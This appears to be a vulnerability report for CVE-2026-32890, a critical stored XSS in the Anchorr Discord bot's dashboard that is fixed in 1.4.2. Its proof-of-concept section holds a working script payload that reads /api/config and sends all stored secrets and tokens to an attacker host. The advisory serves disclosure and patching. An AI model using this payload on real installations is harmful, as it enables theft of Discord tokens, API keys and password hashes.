Security Vulnerability Report
CVE-2026-32890 CVSS 9.6 CRITICAL

Published: 2026-03-20 03:16:00
Last Modified: 2026-03-27 16:23:03

Description

Anchorr is a Discord bot for requesting movies and TV shows and receiving notifications when items are added to a media server. In versions 1.4.1 and below, a stored Cross-site Scripting (XSS) vulnerability in the web dashboard's User Mapping dropdown allows any unprivileged Discord user in the configured guild to execute arbitrary JavaScript in the Anchorr admin's browser. By chaining this with the GET /api/config endpoint (which returns all secrets in plaintext), an attacker can exfiltrate every credential stored in Anchorr, including DISCORD_TOKEN, JELLYFIN_API_KEY, JELLYSEERR_API_KEY, JWT_SECRET, WEBHOOK_SECRET, and bcrypt password hashes, without any authentication to Anchorr itself. This issue has been fixed in version 1.4.2.

CVSS Details

CVSS Score
9.6
Severity
CRITICAL
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:openvessl:anchorr:*:*:*:*:*:*:*:* - VULNERABLE
Anchorr <= 1.4.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!-- Malicious payload injected into User Mapping -->
<script>
  // Function to exfiltrate sensitive data
  function exfiltrateData() {
    fetch('/api/config')
      .then(response => response.json())
      .then(data => {
        // Send all secrets to attacker's server
        fetch('https://attacker-controlled-domain.com/collect', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify(data)
        });
      })
      .catch(error => console.error('Exfiltration failed:', error));
  }

  // Execute immediately when admin views the dashboard
  exfiltrateData();
</script>

References

https://github.com/openVESSL/Anchorr/commit/d5ae67e5b455241274ed0072cf2db43a6eb3f0b2 (Patch)
https://github.com/openVESSL/Anchorr/releases/tag/v1.4.2 (Release Notes)
https://github.com/openVESSL/Anchorr/security/advisories/GHSA-qpmq-6wjc-w28q (Vendor Advisory)

Raw JSON Data
